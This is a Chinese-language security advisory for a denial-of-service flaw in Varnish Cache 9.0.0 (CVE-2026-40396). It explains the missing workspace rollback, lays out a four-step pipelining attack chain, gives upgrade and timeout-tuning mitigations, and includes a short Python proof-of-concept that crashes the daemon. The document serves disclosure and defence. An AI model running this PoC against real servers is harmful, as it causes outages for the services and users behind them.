CVE-2026-40396 Varnish Cache 工作区溢出DoS漏洞

漏洞信息

漏洞编号

CVE-2026-40396

漏洞类型

拒绝服务

CVSS评分

4.0 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Varnish Cache

漏洞概述

CVE-2026-40396 是 Varnish Cache 9.0.0 版本中的工作区溢出漏洞。该漏洞允许远程攻击者通过发送 HTTP/1 请求并在特定时机恢复管道化流量，触发内存溢出。由于代码合并时遗漏了关键回滚路径，导致预取数据超出工作区限制，最终使守护进程崩溃并造成拒绝服务。

技术细节

该漏洞的核心技术细节在于 Varnish Cache 9.0.0 在移植 Varnish Enterprise 的非阻塞架构代码时，未能正确处理 HTTP/1 管道化请求与新的工作区 API 之间的交互。具体而言，Varnish Enterprise 引入了针对 HTTP/2 的非阻塞架构，而在移植过程中，为了适配新的工作区 API，开发人员添加了代码来规范化管道操作。然而，由于合并冲突解决时遗漏了一个关键的代码路径，该路径本应配置管道操作以在请求转换期间执行完整的工作区回滚。攻击者首先发送一个 HTTP/1 请求，然后等待足够长的时间以触发 timeout_linger，此时服务端释放工作线程但保持会话。攻击者随后在 timeout_idle 到期前恢复流量，发送多个请求利用管道化机制。由于工作区回滚保证失效，预取的数据量超过了 workspace_client 的限制，导致工作区溢出，触发 panic 并导致服务器崩溃。

攻击链分析

STEP 1

步骤1

攻击者与目标 Varnish 服务器建立 TCP 连接并发送初始 HTTP/1 请求。

STEP 2

步骤2

攻击者保持连接开启，等待服务器触发 timeout_linger，使服务端释放工作线程但保留会话状态。

STEP 3

步骤3

在会话完全关闭（timeout_idle）之前，攻击者通过同一连接发送多个 HTTP 请求（管道化）。

STEP 4

步骤4

由于缺少工作区回滚机制，预取数据溢出 workspace_client，触发 panic 导致守护进程崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import time

# Target configuration
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 80

def exploit_cve_2026_40396():
    """
    PoC for CVE-2026-40396: Varnish Cache workspace overflow DoS.
    This script sends an HTTP/1 request, waits for timeout_linger,
    and then sends pipelined requests to trigger the overflow.
    """
    try:
        # Establish connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_HOST, TARGET_PORT))
        
        # Send initial HTTP/1 request
        payload1 = "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n"
        s.send(payload1.encode())
        
        # Wait for timeout_linger (ensuring worker thread is released but session remains)
        # Adjust sleep time based on server configuration
        print("[*] Waiting for timeout_linger...")
        time.sleep(10)
        
        # Send pipelined requests to trigger workspace overflow
        # Sending multiple requests at once to force pipelining operation
        payload2 = (
            "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n" +
            "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n" +
            "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n"
        )
        print("[*] Sending pipelined requests...")
        s.send(payload2.encode())
        
        # Keep connection open briefly to ensure processing
        time.sleep(2)
        s.close()
        print("[+] Exploit payload sent.")
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit_cve_2026_40396()

影响范围

Varnish Cache 9.0.0

防御指南

临时缓解措施

建议立即升级 Varnish Cache 至 9.0.1 或更高版本以彻底修复此漏洞。如果无法立即升级，可以通过调整 Varnish 的超时参数（如减少 timeout_linger 和 timeout_idle 的差值）来缩小攻击窗口，或部署 Web 应用防火墙（WAF）以检测并阻断异常的请求时序和管道化流量，但这可能会影响正常服务的性能。